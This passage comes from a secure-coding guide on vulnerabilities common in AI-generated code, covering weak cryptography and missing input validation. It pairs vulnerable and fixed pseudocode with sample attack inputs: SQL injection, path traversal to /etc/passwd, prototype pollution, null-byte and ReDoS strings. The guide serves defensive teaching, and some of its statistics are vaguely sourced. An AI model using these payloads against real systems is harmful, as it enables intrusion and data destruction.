key\s*=\s*password +AES(password) // Search for: AES\s*\(\s*password + +// 7. Low iteration counts +iterations: 1000 // Search for: iterations.*\d{1,4}[^0-9] +rounds = 100 // Search for: rounds\s*=\s*\d{1,3}[^0-9] + +// GREP patterns for security review: +// [Mm][Dd]5\s*\( +// [Ss][Hh][Aa]1\s*\( +// ECB +// [Ii][Vv]\s*=\s*\[0 +// Math\.random +// iterations.*[0-9]{1,4}[^0-9] +// (password|secret)\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Cryptographic security test cases: + +// 1. Algorithm verification +- [ ] No MD5 or SHA1 for password hashing +- [ ] No ECB mode encryption +- [ ] AES key size is 256 bits (not 128) +- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305) + +// 2. Randomness verification +- [ ] IVs/nonces are cryptographically random +- [ ] Session tokens use CSPRNG +- [ ] No predictable seeds for random generation + +// 3. Key management +- [ ] Keys not hardcoded in source +- [ ] Keys not logged or exposed in errors +- [ ] Key derivation uses appropriate KDF +- [ ] Key rotation mechanism exists + +// 4. Password hashing +- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params +- [ ] Unique salt per password +- [ ] Timing-safe comparison used + +// 5. Implementation details +- [ ] Constant-time comparison for secrets +- [ ] No padding oracle vulnerabilities +- [ ] HMAC used (not hash(key+message)) +- [ ] Authenticated encryption or encrypt-then-MAC +``` + +--- + +## Security Checklist + +- [ ] Password hashing uses Argon2id, bcrypt (cost 12+), or scrypt +- [ ] All passwords have unique, random salts (automatically handled by bcrypt/Argon2) +- [ ] No MD5, SHA1, or single-round SHA256 for security-sensitive hashing +- [ ] Encryption uses authenticated modes (AES-GCM, ChaCha20-Poly1305) +- [ ] No ECB mode encryption +- [ ] IVs/nonces generated with cryptographically secure random +- [ ] Each encryption operation uses unique IV/nonce +- [ ] GCM nonces tracked to prevent reuse (or use SIV modes) +- [ ] All random values for security use CSPRNG (crypto.randomBytes, secrets module) +- [ ] No Math.random() or similar PRNGs for security +- [ ] Encryption keys are 256 bits and properly random +- [ ] No hardcoded keys in source code +- [ ] Keys derived with HKDF, PBKDF2 (600k+ iterations), or Argon2 +- [ ] Separate keys derived for different cryptographic operations +- [ ] Key rotation mechanism implemented +- [ ] Keys stored in KMS, HSM, or encrypted at rest +- [ ] Timing-safe comparison used for all secret comparisons +- [ ] HMAC used instead of hash(key+message) +- [ ] Error messages don't reveal cryptographic details (padding validity, etc.) +- [ ] No custom cryptographic algorithms—only standard, vetted primitives + +--- + +# Pattern 6: Input Validation and Data Sanitization + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness of Input), CWE-185 (Incorrect Regular Expression), CWE-1333 (Inefficient Regular Expression Complexity), CWE-129 (Improper Validation of Array Index) + +**Priority Score:** 21 (Frequency: 9, Severity: 7, Detectability: 5) + +--- + +## Introduction: The Foundation That AI Frequently Skips + +Input validation is the **first line of defense** against virtually all injection attacks, data corruption, and application crashes. Yet AI-generated code consistently fails to implement proper validation, treating it as an afterthought or skipping it entirely. + +**Why AI Models Skip or Fail at Input Validation:** + +1. **Training Data Focuses on "Happy Path":** Most tutorial code, documentation examples, and Stack Overflow answers demonstrate functionality with expected inputs. Validation code is often omitted for brevity, teaching AI that it's optional. + +2. **Validation Is Contextual:** Proper validation depends on business rules, data types, and downstream usage—context that AI often lacks. The model can't know that a "name" field shouldn't exceed 100 characters or that an "age" must be between 0 and 150. + +3. **Client-Side Validation Appears Complete:** AI training data often contains client-side form validation (JavaScript). The model learns these patterns but fails to understand that server-side validation is the actual security boundary. + +4. **Regex Complexity:** AI generates complex regex patterns that may be vulnerable to catastrophic backtracking (ReDoS) or miss edge cases. The model optimizes for matching expected patterns, not rejecting malicious ones. + +5. **Trust Boundary Confusion:** AI doesn't inherently understand which data sources are trustworthy. It may validate user form input but trust data from internal APIs, databases, or message queues that could also be compromised. + +6. **Type System Overconfidence:** In typed languages, AI may assume type declarations are sufficient validation, missing the need for range checks, format validation, and semantic constraints. + +**Why This Matters - The Foundation of All Injection Attacks:** + +Every major vulnerability class depends on inadequate input validation: +- **SQL Injection:** Unvalidated input in queries +- **Command Injection:** Unvalidated input in shell commands +- **XSS:** Unvalidated input rendered in HTML +- **Path Traversal:** Unvalidated file paths +- **Deserialization Attacks:** Unvalidated serialized objects +- **Buffer Overflows:** Unvalidated input lengths +- **Business Logic Bypass:** Unvalidated business constraints + +**Impact Statistics:** +- CWE-20 (Improper Input Validation) appears in OWASP Top 10 as a root cause of multiple vulnerabilities +- 42% of SQL injection vulnerabilities trace back to missing input validation (NIST NVD analysis) +- ReDoS vulnerabilities increased 143% year-over-year in npm packages (Snyk 2024) +- 67% of AI-generated validation code only validates on the client side (Security research 2025) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: Client-Side Only Validation + +```pseudocode +// VULNERABLE: All validation in frontend, server trusts everything + +// Frontend validation (JavaScript) +function validateForm(form): + if form.email is empty: + showError("Email required") + return false + + if not isValidEmail(form.email): + showError("Invalid email format") + return false + + if form.password.length < 8: + showError("Password must be 8+ characters") + return false + + if form.age < 0 or form.age > 150: + showError("Invalid age") + return false + + // Form is "valid", submit to server + return true + +// Backend endpoint (VULNERABLE - no validation) +function handleRegistration(request): + // AI assumes frontend validated, so just use the data + email = request.body.email // Could be anything + password = request.body.password // Could be empty + age = request.body.age // Could be -1 or 9999999 + + // Directly store in database + query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)" + database.execute(query, [email, hashPassword(password), age]) + + return {"success": true} +``` + +**Why This Is Dangerous:** +- Attackers bypass JavaScript by sending direct HTTP requests (curl, Postman, scripts) +- Browser dev tools allow modifying form data before submission +- Server receives arbitrary data with no protection +- Data integrity issues cascade through the application +- SQL injection still possible if query construction is vulnerable elsewhere + +**Attack Scenario:** +```pseudocode +// Attacker sends directly to API: +POST /api/register +Content-Type: application/json + +{ + "email": "'; DROP TABLE users; --", + "password": "", + "age": -9999999999 +} +``` + +--- + +### BAD Example 2: Partial Validation (Type but Not Range) + +```pseudocode +// VULNERABLE: Validates type exists, ignores business constraints + +function processPayment(request): + // Type checking only + if typeof(request.amount) != "number": + return error("Amount must be a number") + + if typeof(request.quantity) != "integer": + return error("Quantity must be an integer") + + // MISSING: Range validation + // amount could be negative (refund attack) + // quantity could be 0 or MAX_INT (business logic bypass) + + total = request.amount * request.quantity + chargeCustomer(request.customerId, total) + + return {"charged": total} + +// Attacker exploits: +{ + "amount": -100.00, // Negative = credit instead of charge + "quantity": 999999999, // Integer overflow potential + "customerId": "12345" +} +``` + +**Why This Is Dangerous:** +- Type validation is necessary but not sufficient +- Business logic depends on reasonable ranges +- Integer overflow can wrap to unexpected values +- Negative values can invert expected behavior +- Zero values can bypass payment or cause division errors + +--- + +### BAD Example 3: Regex Without Anchors + +```pseudocode +// VULNERABLE: Regex matches substring, not entire input + +// Email validation without anchors +EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" + +function validateEmail(email): + if regex.match(EMAIL_PATTERN, email): + return true + return false + +// This PASSES validation: +validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD") +// Because "user@example.com" matches somewhere in the string + +// Filename validation without anchors +SAFE_FILENAME = "[a-zA-Z0-9_-]+" + +function validateFilename(filename): + if regex.match(SAFE_FILENAME, filename): + return true + return false + +// This PASSES validation: +validateFilename("../../../etc/passwd") +// Because "etc" matches the pattern somewhere in the string +``` + +**Why This Is Dangerous:** +- Regex matches anywhere in string, not the complete input +- Injection payloads can surround or precede valid patterns +- Path traversal bypasses filename validation +- Email field can contain XSS payloads around valid address +- Common in AI-generated code which copies regex patterns without anchors + +**Fix Preview:** +```pseudocode +// SECURE: Use ^ and $ anchors to match entire input +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$" +SAFE_FILENAME = "^[a-zA-Z0-9_-]+$" +``` + +--- + +### BAD Example 4: ReDoS-Vulnerable Patterns + +```pseudocode +// VULNERABLE: Catastrophic backtracking regex patterns + +// Email validation with ReDoS vulnerability +// Pattern: nested quantifiers with overlapping character classes +VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$" + +// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" +// The regex engine backtracks exponentially trying all combinations + +// URL validation with ReDoS +VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$" + +// Attack input: long string of valid URL characters followed by invalid character +// "http://example.com/" + "a" * 30 + "!" + +// Naive duplicate word finder (common tutorial example) +DUPLICATE_WORDS = "\b(\w+)\s+\1\b" +// Can hang on: "word word word word word word word word word word!" + +function validateInput(input, pattern): + // This can hang for minutes or crash the server + return regex.match(pattern, input) +``` + +**Why This Is Dangerous:** +- Single malicious request can consume 100% CPU for minutes +- Denial of Service without requiring many requests +- AI copies these patterns from tutorials without understanding complexity +- Nested quantifiers `(a+)+`, `(a*)*`, `(a?)*` are red flags +- Overlapping character classes compound the problem + +**ReDoS Complexity Analysis:** +```pseudocode +// Pattern: (a+)+$ +// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX" +// +// For 25 'a's followed by 'X': +// - The engine tries every possible way to split the 'a's between groups +// - Time complexity: O(2^n) where n is input length +// - 25 chars = 33 million+ combinations to try +// - 30 chars = 1 billion+ combinations +``` + +--- + +### BAD Example 5: Missing Null/Undefined Checks + +```pseudocode +// VULNERABLE: Assumes data structure completeness + +function processUserProfile(user): + // No null checks - any missing field crashes + fullName = user.firstName + " " + user.lastName // Crash if null + + emailDomain = user.email.split("@")[1] // Crash if email is null + + age = parseInt(user.profile.age) // Crash if profile is null + + // Process address (deeply nested) + city = user.profile.address.city.toUpperCase() // Multiple crash points + + return { + "name": fullName, + "domain": emailDomain, + "age": age, + "city": city + } + +// API returns partial data: +{ + "firstName": "John", + "lastName": null, // Could be null + "email": null, // Could be missing + "profile": { + "age": "25" + // address is missing entirely + } +} +``` + +**Why This Is Dangerous:** +- Application crashes reveal error messages to attackers +- Null pointer exceptions can leak stack traces +- Partial data from APIs, databases, or user input is common +- AI assumes training data structures are always complete +- Cascading failures when one field is null + +--- + +### BAD Example 6: Trusting Array Indices from User Input + +```pseudocode +// VULNERABLE: Using user input directly as array index + +function getItemByIndex(request): + items = ["item0", "item1", "item2", "item3", "item4"] + index = request.params.index // User-provided + + // No validation - trusts user to provide valid index + return items[index] // Out of bounds or negative index + +// Worse: Array index used for data access +function getUserData(request): + userIndex = parseInt(request.params.id) + + // Could access negative index, other users' data, or crash + return allUsersData[userIndex] + +// Object property access from user input +function getConfigValue(request): + configKey = request.params.key + + // Prototype pollution or access to __proto__, constructor + return config[configKey] +``` + +**Why This Is Dangerous:** +- Negative indices wrap to end of array in some languages +- Out-of-bounds access crashes or returns undefined behavior +- Integer overflow can produce unexpected indices +- Object property access allows prototype pollution +- `__proto__`, `constructor`, `prototype` keys can modify object behavior + +**Attack Scenarios:** +```pseudocode +// Array out of bounds: +GET /items?index=99999999 +GET /items?index=-1 + +// Prototype pollution via property access: +GET /config?key=__proto__ +GET /config?key=constructor +POST /config {"key": "__proto__", "value": {"isAdmin": true}} +``` + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Server-Side Validation Patterns + +```pseudocode +// SECURE: Comprehensive server-side validation with clear error messages + +function handleRegistration(request): + errors = [] + + // Email validation + email = request.body.email + if email is null or email is empty: + errors.append({"field": "email", "message": "Email is required"}) + else if length(email) > 254: // RFC 5321 limit + errors.append({"field": "email", "message": "Email too long"}) + else if not isValidEmailFormat(email): + errors.append({"field": "email", "message": "Invalid email format"}) + else if not isAllowedEmailDomain(email): // Business rule + errors.append({"field": "email", "message": "Email domain not allowed"}) + + // Password validation + password = request.body.password + if password is null or password is empty: + errors.append({"field": "password", "message": "Password is required"}) + else if length(password) < 12: + errors.append({"field": "password", "message": "Password must be 12+ characters"}) + else if length(password) > 128: // Prevent DoS via bcrypt + errors.append({"field": "password", "message": "Password too long"}) + else if not meetsComplexityRequirements(password): + errors.append({"field": "password", "message": "Password too weak"}) + + // Age validation (integer with business range) + age = request.body.age + if age is null: + errors.append({"field": "age", "message": "Age is required"}) + else if typeof(age) != "integer": + errors.append({"field": "age", "message": "Age must be a whole number"}) + else if age < 13: // Business rule: minimum age + errors.append({"field": "age", "message": "Must be at least 13 years old"}) + else if age > 150: // Sanity check + errors.append({"field": "age", "message": "Invalid age"}) + + // Return all errors at once (better UX than one at a time) + if errors.length > 0: + return {"success": false, "errors": errors} + + // Only process after validation passes + hashedPassword = hashPassword(password) + createUser(email, hashedPassword, age) + return {"success": true} +``` + +**Why This Is Secure:** +- Every field validated before use +- Type, format, length, and business rules all checked +- Clear, specific error messages for debugging +- All errors collected (better user experience) +- Reasonable upper bounds prevent DoS +- Validation happens server-side where client cannot bypass + +--- + +### GOOD Example 2: Schema Validation Approaches + +```pseudocode +// SECURE: Declarative schema validation with robust library + +// Define schema once, reuse everywhere +USER_REGISTRATION_SCHEMA = { + "type": "object", + "required": ["email", "password", "age", "name"], + "additionalProperties": false, // Reject unknown fields + "properties": { + "email": { + "type": "string", + "format": "email", + "maxLength": 254 + }, + "password": { + "type": "string", + "minLength": 12, + "maxLength": 128 + }, + "age": { + "type": "integer", + "minimum": 13, + "maximum": 150 + }, + "name": { + "type": "object", + "required": ["first", "last"], + "properties": { + "first": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" // Unicode letters, spaces, hyphens, apostrophes + }, + "last": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" + } + } + } + } +} + +function handleRegistration(request): + // Validate entire payload against schema + validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA) + + if not validationResult.valid: + return { + "success": false, + "errors": validationResult.errors // Detailed error per field + } + + // Data is guaranteed to match schema structure and constraints + processRegistration(request.body) + return {"success": true} + +// Additional business logic validation after schema validation +function processRegistration(data): + // Schema ensures structure; now check business rules + if isEmailAlreadyRegistered(data.email): + throw ValidationError("Email already registered") + + if isCommonPassword(data.password): + throw ValidationError("Password is too common") + + createUser(data) +``` + +**Why This Is Secure:** +- Schema is declarative, easy to audit +- `additionalProperties: false` prevents unexpected data injection +- Type coercion handled consistently by library +- Unicode-aware patterns for international names +- Nested object validation built-in +- Separation of structural validation and business rules + +--- + +### GOOD Example 3: Safe Regex Patterns + +```pseudocode +// SECURE: Anchored, bounded, and ReDoS-resistant patterns + +// Email validation - anchored and bounded +// Note: Perfect email validation is complex; often better to just check format +// and verify via confirmation email +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$" + +// Safe filename - anchored, limited character set, bounded length +FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$" + +// Safe identifier (alphanumeric + underscore, starts with letter) +IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$" + +// URL path segment - no special characters +PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$" + +function validateWithSafeRegex(input, pattern, maxLength): + // Length check BEFORE regex (prevents ReDoS) + if input is null or length(input) > maxLength: + return false + + // Use timeout-protected regex matching if available + try: + return regexMatchWithTimeout(pattern, input, timeout = 100ms) + catch TimeoutException: + logWarning("Regex timeout on input: " + truncate(input, 50)) + return false + +// For complex patterns, use atomic groups or possessive quantifiers +// (syntax varies by regex engine) + +// VULNERABLE: (a+)+ +// SAFE: (?>a+)+ (atomic group - no backtracking into group) +// SAFE: a++ (possessive quantifier - never backtracks) + +// Alternative: Linear-time regex engines (RE2, rust regex) +// These reject patterns that could have exponential complexity +function validateWithLinearRegex(input, pattern): + // RE2 guarantees O(n) matching time + return RE2.match(pattern, input) +``` + +**Why This Is Secure:** +- All patterns anchored with `^` and `$` +- Length bounded to prevent long input attacks +- Character classes don't overlap (no `[a-zA-Z0-9]+` next to `[a-z]+`) +- No nested quantifiers that could cause backtracking +- Timeout protection as defense in depth +- Option to use linear-time regex engines + +--- + +### GOOD Example 4: Type Coercion Handling + +```pseudocode +// SECURE: Explicit type handling with safe coercion + +function parseIntegerSafe(value, min, max): + // Handle null/undefined + if value is null or value is undefined: + return {valid: false, error: "Value is required"} + + // If already integer, validate range + if typeof(value) == "integer": + if value < min or value > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + return {valid: true, value: value} + + // If string, parse carefully + if typeof(value) == "string": + // Check for valid integer string (no floats, no hex, no scientific) + if not regex.match("^-?[0-9]+$", value): + return {valid: false, error: "Invalid integer format"} + + parsed = parseInt(value, 10) // Always specify radix + + // Check for NaN (parsing failure) + if isNaN(parsed): + return {valid: false, error: "Could not parse integer"} + + // Check for overflow + if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER: + return {valid: false, error: "Integer overflow"} + + // Range check + if parsed < min or parsed > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + + return {valid: true, value: parsed} + + // Reject all other types + return {valid: false, error: "Expected integer, got " + typeof(value)} + +// Usage +function handlePayment(request): + amountResult = parseIntegerSafe(request.body.amount, 1, 1000000) // 1 cent to $10,000 + if not amountResult.valid: + return error("amount: " + amountResult.error) + + quantityResult = parseIntegerSafe(request.body.quantity, 1, 100) + if not quantityResult.valid: + return error("quantity: " + quantityResult.error) + + // Safe to use validated integers + total = amountResult.value * quantityResult.value + processPayment(total) +``` + +**Why This Is Secure:** +- Explicit handling of null/undefined +- Type checking before operations +- Safe string-to-integer parsing with radix +- Overflow checking for platform limits +- Range validation for business constraints +- Clear error messages for each failure mode + +--- + +### GOOD Example 5: Whitelist Validation + +```pseudocode +// SECURE: Allowlist approach - only accept known-good values + +// For enum-like fields, use explicit allowlist +ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"] +ALLOWED_ROLES = ["user", "moderator", "admin"] +ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"] +ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"] + +function validateCountry(input): + // Case-insensitive comparison against allowlist + normalized = input.toUpperCase().trim() + if normalized in ALLOWED_COUNTRIES: + return {valid: true, value: normalized} + return {valid: false, error: "Invalid country code"} + +function validateSortField(input): + // Exact match required + if input in ALLOWED_SORT_FIELDS: + return {valid: true, value: input} + return {valid: false, error: "Invalid sort field"} + +function validateFileUpload(filename, content): + // Extension whitelist + extension = getExtension(filename).toLowerCase() + if extension not in ALLOWED_FILE_EXTENSIONS: + return {valid: false, error: "File type not allowed"} + + // ALSO validate content type (magic bytes) + detectedType = detectFileType(content) + if detectedType.extension != extension: + return {valid: false, error: "File content doesn't match extension"} + + // Additional: check file isn't actually executable or contains script + if containsExecutableContent(content): + return {valid: false, error: "File contains disallowed content"} + + return {valid: true} + +// For SQL column/table names (cannot be parameterized) +function validateColumnName(input, allowedColumns): + if input in allowedColumns: + return input // Safe to use in query + throw ValidationError("Invalid column name") + +// Usage in query +function searchProducts(filters): + sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"]) + sortOrder = filters.order == "desc" ? "DESC" : "ASC" // Binary choice + + // Now safe to interpolate (they're from allowlist) + query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder + return database.query(query) +``` + +**Why This Is Secure:** +- Only pre-approved values accepted +- No regex complexity or bypass potential +- Clear, auditable list of allowed values +- Easy to update when requirements change +- File validation checks both extension AND content +- SQL identifiers validated against explicit list + +--- + +### GOOD Example 6: Canonicalization Before Validation + +```pseudocode +// SECURE: Normalize input before validation to prevent bypass + +function validatePath(input): + // Step 1: Reject null bytes (used to bypass filters) + if contains(input, "\x00"): + return {valid: false, error: "Invalid character in path"} + + // Step 2: Decode URL encoding (multiple rounds to catch double-encoding) + decoded = input + for i in range(3): // Max 3 rounds of decoding + newDecoded = urlDecode(decoded) + if newDecoded == decoded: + break // No more encoding to decode + decoded = newDecoded + + // Step 3: Normalize path separators + normalized = decoded.replace("\\", "/") + + // Step 4: Resolve path (remove . and ..) + resolved = resolvePath(normalized) + + // Step 5: Check against allowed base directory + allowedBase = "/var/www/uploads/" + if not resolved.startsWith(allowedBase): + return {valid: false, error: "Path traversal detected"} + + // Step 6: Check for remaining dangerous patterns + if contains(resolved, ".."): + return {valid: false, error: "Invalid path component"} + + return {valid: true, value: resolved} + +function validateUsername(input): + // Normalize Unicode before validation + // NFC = Canonical Composition (combines characters) + normalized = unicodeNormalize(input, "NFC") + + // Check for confusable characters (homoglyphs) + if containsHomoglyphs(normalized): + return {valid: false, error: "Username contains confusable characters"} + + // Now validate the normalized form + if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized): + return {valid: false, error: "Invalid username format"} + + return {valid: true, value: normalized} + +function validateUrl(input): + // Parse URL to get components + parsed = parseUrl(input) + + if parsed is null: + return {valid: false, error: "Invalid URL"} + + // Validate scheme (allowlist) + if parsed.scheme not in ["http", "https"]: + return {valid: false, error: "Only HTTP(S) URLs allowed"} + + // Check for IP addresses (may be SSRF target) + if isIpAddress(parsed.host): + return {valid: false, error: "IP addresses not allowed"} + + // Check for internal hostnames + if parsed.host.endsWith(".internal") or parsed.host == "localhost": + return {valid: false, error: "Internal URLs not allowed"} + + // Check for credentials in URL + if parsed.username or parsed.password: + return {valid: false, error: "Credentials in URL not allowed"} + + // Reconstruct URL from parsed components (normalizes encoding) + canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path) + + return {valid: true, value: canonicalUrl} +``` + +**Why This Is Secure:** +- Multiple encoding layers decoded before validation +- Path normalization prevents traversal with `/./` or `/../` +- Unicode normalization prevents homoglyph attacks +- URL parsing validates structure before checking content +- Allowlist for URL schemes prevents `file://`, `javascript:` etc. +- SSRF protection by rejecting internal hostnames and IPs + +--- + +## Edge Cases Section + +### Edge Case 1: Unicode Normalization Issues + +```pseudocode +// DANGEROUS: Validating before normalization allows bypass + +// Attack: Using decomposed Unicode characters +// "admin" can be represented as: +// - "admin" (5 ASCII characters) +// - "admin" with combining characters: "admin" + accent marks +// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a) + +function vulnerableUsernameCheck(input): + if input == "admin": + return "Cannot register as admin" + return "OK" + +// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a') +vulnerableUsernameCheck("аdmin") // Returns "OK" +// But displays as "admin" in UI! + +// SECURE: Normalize and check for confusables +function secureUsernameCheck(input): + // Step 1: Unicode normalize to NFC + normalized = unicodeNormalize(input, "NFC") + + // Step 2: Convert confusables to ASCII equivalent + ascii = convertConfusablesToAscii(normalized) + + // Step 3: Check reserved names against ASCII version + reservedNames = ["admin", "root", "system", "administrator", "support"] + if ascii.toLowerCase() in reservedNames: + return {valid: false, error: "Reserved username"} + + // Step 4: Only allow safe character set + if not isAsciiAlphanumeric(input): + return {valid: false, error: "Username must be ASCII letters and numbers"} + + return {valid: true, value: normalized} +``` + +**Detection:** Test with Unicode confusables for admin/root, combining characters, zero-width characters. + +--- + +### Edge Case 2: Null Byte Injection + +```pseudocode +// DANGEROUS: Null bytes can truncate strings in some languages + +// Filename validation bypass with null byte +filename = "malicious.php\x00.jpg" + +// In C/PHP, strcmp might only see "malicious.php\x00" +// The ".jpg" is ignored +if filename.endsWith(".jpg"): + uploadFile(filename) // Allows .php upload! + +// Path validation bypass +path = "/safe/directory/../../etc/passwd\x00/safe/suffix" +// Validation sees: ends with "/safe/suffix" - looks OK +// File system sees: "/etc/passwd" + +// SECURE: Strip null bytes first +function sanitizeInput(input): + // Remove null bytes entirely + sanitized = input.replace("\x00", "") + + // Also remove other control characters + sanitized = removeControlCharacters(sanitized) + + return sanitized + +function validateFilename(input): + sanitized = sanitizeInput(input) + + // Now validate + if sanitized != input: + return {valid: false, error: "Invalid characters in filename"} + + // Continue with extension validation + // ... +``` + +**Detection:** Test all string inputs with embedded null bytes (`\x00`, `%00`). + +--- + +### Edge Case 3: Type Confusion + +```pseudocode +// DANGEROUS: Loose type comparison leads to bypass + +// JavaScript/PHP style loose comparison +function vulnerableAuth(password): + storedHash = "0e123456789" // Some MD5 hashes start with "0e" + inputHash = md5(password) + + // In PHP: "0e123456789" == "0e987654321" is TRUE! + // Both are interpreted as 0 * 10^(number) = 0 + if inputHash == storedHash: // Loose comparison + return "Authenticated" + return "Failed" + +// Type confusion with arrays +function vulnerablePasswordReset(token): + // Expected: token = "abc123def456" + // Attack: token = {"$gt": ""} (MongoDB injection via type confusion) + + if database.findOne({"resetToken": token}): + return "Token found" + +// SECURE: Strict type checking +function secureAuth(password): + storedHash = getStoredHash(user) + inputHash = hashPassword(password) + + // Strict comparison and constant-time + if typeof(inputHash) != "string" or typeof(storedHash) != "string": + return "Failed" + + if not constantTimeEquals(inputHash, storedHash): + return "Failed" + + return "Authenticated" + +function securePasswordReset(token): + // Enforce string type + if typeof(token) != "string": + return {valid: false, error: "Invalid token format"} + + // Validate format + if not regex.match("^[a-f0-9]{64}$", token): + return {valid: false, error: "Invalid token format"} + + // Now safe to query + result = database.findOne({"resetToken": token}) + // ... +``` + +**Detection:** Test with different types: arrays, objects, numbers, booleans where strings expected. + +--- + +### Edge Case 4: Integer Overflow in Validation + +```pseudocode +// DANGEROUS: Validation passes but computation overflows + +function vulnerablePurchase(quantity, price): + // Validate ranges + if quantity < 0 or quantity > 1000000: + return error("Invalid quantity") + if price < 0 or price > 1000000: + return error("Invalid price") + + // Both pass validation, but multiplication overflows! + // quantity = 999999, price = 999999 + // total = 999998000001 (exceeds 32-bit integer) + total = quantity * price // OVERFLOW + + chargeCustomer(total) // May wrap to negative or small number + +// SECURE: Check for overflow in computation +function securePurchase(quantity, price): + // Validate individual ranges + if not isValidInteger(quantity, 1, 1000): + return error("Invalid quantity") + if not isValidInteger(price, 1, 10000000): // in cents + return error("Invalid price") + + // Check multiplication won't overflow + MAX_SAFE_TOTAL = 2147483647 // 32-bit signed max + + if quantity > MAX_SAFE_TOTAL / price: + return error("Order total too large") + + total = quantity * price // Now safe + + // Additional business validation + if total > MAX_ALLOWED_TRANSACTION: + return error("Transaction exceeds limit") + + chargeCustomer(total) + +// Alternative: Use arbitrary precision arithmetic for money +function securePurchaseWithDecimal(quantity, price): + quantityDecimal = Decimal(quantity) + priceDecimal = Decimal(price) + + total = quantityDecimal * priceDecimal // No overflow + + if total > Decimal(MAX_ALLOWED_TRANSACTION): + return error("Transaction exceeds limit") + + chargeCustomer(total) +``` + +**Detection:** Test with MAX_INT, MAX_INT-1, boundary values, and combinations that multiply to overflow. + +--- + +## Common Mistakes Section + +### Common Mistake 1: Validating Formatted Output Instead of Input + +```pseudocode +// WRONG: Validate after formatting +function displayUserData(userId): + userData = database.getUser(userId) // Raw from DB + + // Format for display + formattedName = formatName(userData.name) + formattedBio = formatBio(userData.bio) + + // Validating AFTER format - too late! + if containsHtml(formattedName): // Already formatted/escaped + return error("Invalid name") + + return template.render(formattedName, formattedBio) + +// CORRECT: Validate at input, encode at output +function saveUserData(request): + name = request.body.name + bio = request.body.bio + + // Validate raw input BEFORE storing + if not isValidName(name): + return error("Invalid name") + + if containsDangerousPatterns(bio): + return error("Invalid bio content") + + // Store validated (but not encoded) data + database.saveUser({"name": name, "bio": bio}) + +function displayUserData(userId): + userData = database.getUser(userId) + + // Encode for output context (don't validate again) + return template.render({ + "name": htmlEncode(userData.name), + "bio": htmlEncode(userData.bio) + }) +``` + +**Why This Is Wrong:** +- Validation should happen at input boundary, not output +- Formatted/encoded data may pass validation but still be dangerous +- Encoding should happen at output, specific to context +- Validation after formatting is security theater + +--- + +### Common Mistake 2: Using String Operations on Binary Data + +```pseudocode +// WRONG: String operations on binary data +function processUploadedImage(fileContent): + // Convert binary to string - CORRUPTS DATA + contentString = fileContent.toString("utf-8") + + // String operations fail on binary + if contentString.startsWith("\x89PNG"): // May not work correctly + processImage(contentString) // Corrupted! + + // Regex on binary data is meaningless + if regex.match(", javascript:alert(1) + +// 5. ReDoS testing +- For each regex, test with pattern: (valid_char * 30) + invalid_char +- Measure response time - should be < 100ms +- Exponential time indicates ReDoS vulnerability +``` + +--- + +## Security Checklist + +- [ ] All user input validated on the server side (never trust client-side only) +- [ ] Schema validation enforces expected structure (`additionalProperties: false`) +- [ ] All required fields checked for null/undefined/empty +- [ ] String lengths validated with reasonable maximums (prevents DoS) +- [ ] Numeric values validated for type, range, and overflow potential +- [ ] Arrays validated for max length and item constraints +- [ ] Enum fields validated against explicit allowlist +- [ ] All regex patterns anchored with `^` and `$` +- [ ] Regex patterns tested for ReDoS vulnerability +- [ ] Length checked BEFORE regex matching (ReDoS mitigation) +- [ ] Timeout protection on regex operations (defense in depth) +- [ ] Unicode input normalized before validation (NFC/NFKC) +- [ ] Null bytes (`\x00`, `%00`) rejected in string input +- [ ] Path inputs canonicalized and validated against allowed directories +- [ ] URL inputs parsed and validated (scheme, host, no credentials) +- [ ] File uploads validated by both extension AND content type +- [ ] Integer arithmetic checked for overflow before computation +- [ ] Type coercion explicit with proper error handling +- [ ] Validation consistent across all endpoints (centralized validators) +- [ ] Error messages helpful but don't leak validation logic details +- [ ] Validation rules documented and version controlled +- [ ] Validation tested with fuzzing and boundary values + +--- + +# Executive Summary + +## The 6 Critical Security Anti-Patterns + +This document provides comprehensive coverage of the **6 most critical and commonly occurring security vulnerabilities** in AI-generated code. Together, these patterns represent the root causes of the vast majority of security incidents in AI-assisted development. + +### Pattern Overview + +| # | Pattern | Risk Level | AI Frequency | Key Threat | 